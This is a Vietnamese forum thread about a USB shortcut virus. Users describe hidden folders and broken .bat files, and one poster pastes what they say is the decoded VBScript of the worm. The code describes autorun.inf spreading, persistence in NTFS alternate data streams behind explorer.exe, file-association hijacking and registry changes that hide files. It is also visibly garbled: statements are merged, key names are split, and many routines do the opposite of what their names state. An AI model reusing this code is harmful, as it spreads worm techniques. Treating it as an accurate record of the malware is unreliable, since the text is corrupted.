Chagiya

New Member
Máy tính em cũng mới bị dính tương tự mấy bác kia, giờ cũng không chạy được mấy file .bat nữa. Em quét virus rồi mà cũng không ăn thua hic
 

Fajer

New Member
Dùng FixAuto đi các bạn. Mình dùng FixAuto hiện các thư mục bị ẩn lên, xóa bỏ các shortcut rồi, quét virus bằng đĩa Boot. Ok rồi.
 
trời ơi mới chiều đem usb đi in cũng bị như vầy mấy cái folder bị copy và shortcut hết.kg biết làm sao.cứ xóa là nó hiện ra hoài

mà bây giờ muốn format usb vẫn kg dc
 
Mình cũng bị con này, là click nghịch chơi thôi, không hiểu nó giấu cái file .vbs ở chỗ nào


search đúng cái tên 1283472473.vbs xóa toàn bộ đi rồi mà vẫn không ăn thua gõ


%SystemRoot%\System32\WScript.exe "C:\WINDOWS\explorer.exe:1283472473.vbs" lại thấy nó chạy như bình thường


Ai biết nó load cái file C:\WINDOWS\explorer.exe:1283472473.vbs thế nào không?


Đây là code của nó nhờ thằng bạn decode rồi ngồi uncompress mãi mới xong :-s
Code: Dim Fso, WshShell

Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")

Set WshShell = CreateObject("wScRipT.SHelL")

Call Main

Sub Main()

On Error Resume Next

Dim Args, VirusLoad, VirusAss

Set Args = WScript.Arguments

VirusLoad = GetMainVirus(1)

VirusAss = GetMainVirus(0)

Call VirusAlert

Call MonitorSystem

End Sub

Sub MonitorSystem()

On Error Resume Next

Dim ProcessNames, ExeFullNames

VBSFullNames = Array(GetMainVirus(1))

Do

Call InvadeSystem(GetMainVirus(1), GetMainVirus(0))

Call KeepProcess(VBSFullNames)

WScript.Sleep 3000

Loop

End Sub

Sub InvadeSystem(VirusLoadPath, VirusAssPath)
On Error Resume Next
Dim Load_Value,File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
Load_Value = "%SystemRoot%\system\svchost.exe " & """" & VirusLoadPath & """"
File_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " %1 %* "
IE_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OIE "
MyCpt_Value1 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OMC "
MyCpt_Value2 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " EMC "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
HCUVer = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
HCUDate = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
VirusCode = GetCode(WScript.ScriptFullName)
Version = 1
HostSourcePath = Fso.GetSpecialFolder(1) & "\Wscript.exe"
HostFilePath = Fso.GetSpecialFolder(0) & "\system\svchost.exe"
For Each Drive In Fso.Drives
If Drive.IsReady And (Drive.DriveType = 1 Or Drive.DriveType = 2 Or Drive.DriveType = 3) Then
DiskVirusName = GetSerialNumber(Drive.DriveLetter) & ".vbs"
Call CreateAutoRun(Drive.DriveLetter, DiskVirusName)
Call InfectRoot(Drive.DriveLetter, DiskVirusName)
End If
Next
If Fso.FileExists(VirusAssPath) = True Or Fso.FileExists(VirusLoadPath) = True Or Fso.FileExists(HostFilePath) = True Then
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
Call SetHiddenAttr(HostFilePath)
Call CreateFile(VirusCode, VirusAssPath)
Call CreateFile(VirusCode, VirusLoadPath)
Call CopyFile(HostSourcePath, HostFilePath)
Else
Call SetHiddenAttr(VirusAssPath)
Call CreateFile(VirusCode, VirusAssPath)
Call SetHiddenAttr(VirusLoadPath)
Call CreateFile(VirusCode, VirusLoadPath)
Call SetHiddenAttr(HostFilePath)
Call CopyFile(HostSourcePath, HostFilePath)
End If
End If

If ReadReg(HCULoad) = Load_Value Then
Call DeleteReg(HCULoad) End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfi le\shell\open\command\") = File_Value Then
Call SetTxtFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifi le\shell\open\command\") = File_Value Then
Call SetIniFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffi le\shell\open\command\") = File_Value Then
Call SetInfFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfi le\shell\open\command\") = File_Value Then
Call SetBatFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfi le\shell\open\command\") = File_Value Then
Call SetCmdFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfi le\shell\open\command\") = File_Value Then
Call SetRegFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.f ile\shell\open\command\") = File_Value Then
Call SetchmFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfi le\shell\open\command\") = File_Value Then
Call SethlpFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Appli cations\iexplore.exe\shell\open\command\") = IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-10 69-A2EA-08002B30309D}\shell\OpenHomePage\Command\") = IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-10 69-A2D8-08002B30309D}\shell\open\command\") = MyCpt_Value1 Then
Call SetMyComputerAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-10 69-A2D8-08002B30309D}\shell\explore\command\") = MyCpt_Value2 Then
Call SetMyComputerAss(VirusAssPath)
End If
Call RegSet
End Sub

Sub CopyFile(source, pathf)
On Error Resume Next
If Fso.FileExists(pathf) Then
Fso.DeleteFile pathf, True
End If
Fso.DeleteFile source, True
End Sub

Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If Fso.FileExists(pathf) Then
Set FileText = Fso.DeleteFile(pathf, True)
End If
End Sub

Sub RegSet()
On Error Resume Next
Dim RegPath1, RegPath2, RegPath3, RegPath4 RegPath1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"
RegPath2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
RegPath3 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
RegPath4 = "HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
Call WriteReg(RegPath1, 2, "REG_DWORD")
Call WriteReg(RegPath2, 1, "REG_DWORD")
Call DeleteReg(RegPath3)
Call WriteReg(RegPath4, "", "REG_SZ")
End Sub

Sub KeepProcess(VBSFullNames)
On Error Resume Next
For Each VBSFullName In VBSFullNames
VBSProcessCount(VBSFullName)
Next
End Sub

Function GetSystemDrive()
GetSystemDrive = Left(Fso.GetSpecialFolder(0), 2)
End Function

Function GetFileSystemType(Drive)
Set D = Fso.GetDrive(Drive) GetFileSystemType = D.FileSystem
End Function

Function ReadReg(strkey)
Dim tmps Set tmps = CreateObject("WScript.Shell")
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function

Sub WriteReg(strkey, Value, vtype)
Dim tmps Set tmps = CreateObject("WScript.Shell")
If vtype = "" Then
tmps.RegWrite strkey, Value Else tmps.RegWrite strkey, Value, vtype
End
If Set tmps = Nothing
End Sub

Sub DeleteReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell") tmps.RegDelete strkey
Set tmps = Nothing
End Sub

Sub SetHiddenAttr(path)
On Error Resume Next
Dim vf
Set vf = Fso.GetFile(path)
Set vf = Fso.GetFolder(path) vf.Attributes = 0
End Sub

Sub Run(ExeFullName)
On Error Resume Next
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ExeFullName
Set WshShell = Nothing
End Sub

Sub InfectRoot(D, VirusName)
On Error Resume Next
Dim VBSCode VBSCode = GetCode(WScript.ScriptFullName)
VBSPath = D & ":\" & VirusName
If Fso.FileExists(VBSPath) = True Then
Call SetHiddenAttr(VBSPath)
Call CreateFile(VBSCode, VBSPath) End If
Set Folder = Fso.GetFolder(D & ":\")
Set SubFolders = Folder.SubFolders
For Each SubFolder In SubFolders
SetHiddenAttr (SubFolder.path) LnkPath = D & ":\" & SubFolder.Name & ".lnk" TargetPath = D & ":\" & VirusName Args = """" & D & ":\" & SubFolder.Name & "\Dir"""
If Fso.FileExists(LnkPath) = True And GetTargetPath(LnkPath) = TargetPath Then
Fso.DeleteFile LnkPath, True
End If
Next
End Sub

Sub CreateAutoRun(D, VirusName)
On Error Resume Next
Dim InfPath, VBSPath, VBSCode InfPath = D & ":\AutoRun.inf": VBSPath = D & ":\" & VirusName
If Fso.FileExists(InfPath) = False Or Fso.FileExists(VBSPath) = False Then
Call SetHiddenAttr(VBSPath)
Call CreateFile(VBSCode, VBSPath)
Call SetHiddenAttr(InfPath)
Call CreateFile(StrInf, InfPath)
End If
End Sub
Sub SetTxtFileAss(sFilePath)
On Error Resume Next
Dim Value Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm. file\shell\open\command\", "REG_EXPAND_SZ")
End Sub
Sub SetIniFileAss(sFilePath)
On Error Resume Next
Dim Value Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inif ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetInfFileAss(sFilePath)
On Error Resume Next
Dim Value Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inff ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetBatFileAss(sFilePath)
On Error Resume Next
Dim Value Value = """" & "%1" & """" & " %*"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetCmdFileAss(sFilePath)
On Error Resume Next
Dim Value Value = """" & "%1" & """" & " %*"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SethlpFileAss(sFilePath)
On Error Resume Next
Dim Value Value = "%SystemRoot%\winhlp32.exe %1"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetRegFileAss(sFilePath)
On Error Resume Next
Dim Value Value = "regedit.exe " & """" & "%1" & """"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetchmFileAss(sFilePath)
On Error Resume Next
Dim Value Value = """" & "%SystemRoot%\hh.exe" & """" & " %1"
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm. file\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetIEAss(sFilePath)
On Error Resume Next
Dim Value Value = """%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Appl ications\iexplore.exe\shell\open\command\", Value, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1 069-A2EA-08002B30309D}\shell\OpenHomePage\Command\" , Value, "REG_EXPAND_SZ")
End Sub

Sub SetMyComputerAss(sFilePath)
On Error Resume Next
Dim Value1, Value2 Value1 = "explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Value2 = "explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1 069-A2D8-08002B30309D}\shell\", "none", "REG_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1 069-A2D8-08002B30309D}\shell\open\command\", Value1, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1 069-A2D8-08002B30309D}\shell\explore\command\", Value2, "REG_EXPAND_SZ")
End Sub

Sub VirusAlert()
On Error Resume Next
Dim HtaPath, HtaCode HtaPath = Fso.GetSpecialFolder(1) & "\BFAlert.hta"
If Fso.FileExists(HtaPath) = True Then
Call CreateFile(HtaCode, HtaPath)
End If
End Sub

Function GetSerialNumber(Drv)
On Error Resume Next
Set D = Fso.GetDrive(Drv) GetSerialNumber = D.SerialNumber GetSerialNumber = Replace(GetSerialNumber, "-", "")
End Function

Function GetMainVirus(N)
On Error Resume Next
MainVirusName = GetSerialNumber(GetSystemDrive()) & ".vbs"
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
If N = 1 Then
GetMainVirus = Fso.GetSpecialFolder(N) & "\smss.exe:" & MainVirusName
End If
If N = 0 Then
GetMainVirus = Fso.GetSpecialFolder(N) & "\explorer.exe:" & MainVirusName
End If
Else
GetMainVirus = Fso.GetSpecialFolder(N) & "\" & MainVirusName
End If
End Function

Function
VBSProcessCount(VBSPath)
On Error Resume Next
Dim WMIService, ProcessList, Process, ParentProcess, PPID VBSProcessCount = 0
Set WMIService = GetObject("winmgmts:\\.\root\cimv2")
Set ProcessList = WMIService.execquery("Select * from Win32_Process Where " & "Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'")
For Each Process In ProcessList
If InStr(Process.CommandLine, VBSPath) > 0 Then
PPID = Process.ParentProcessId Process.Terminate
Set ProcessList = WMIService.execquery("Select * from Win32_Process Where " & "ProcessId=" & PPID)
For Each ParentProcess In ProcessList ParentProcess.Terminate Next
End If
Next
For Each Process In ProcessList
If InStr(Process.CommandLine, VBSPath) > 0 Then
Process.Terminate
End If
Next
End Function

Function GetTargetPath(LnkPath)
On Error Resume Next
Dim Shortcut
Set Shortcut = WshShell.CreateShortcut(LnkPath)
GetTargetPath = Shortcut.TargetPath
End Function

Function GetCode(FullPath)
On Error Resume Next
Dim FileText
Set FileText = Fso_OpenTextFile(FullPath, 1)
GetCode = FileText.ReadAll FileText.Close
End Function

Function GetVersion()
Dim VerInfo
VerInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver" DeleteReg(VerInfo)
End Function

Function GetInfectedDate()
On Error Resume Next
Dim DateInfo DateInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date" DeleteReg(DateInfo)
End Function

 

Các chủ đề có liên quan khác

Top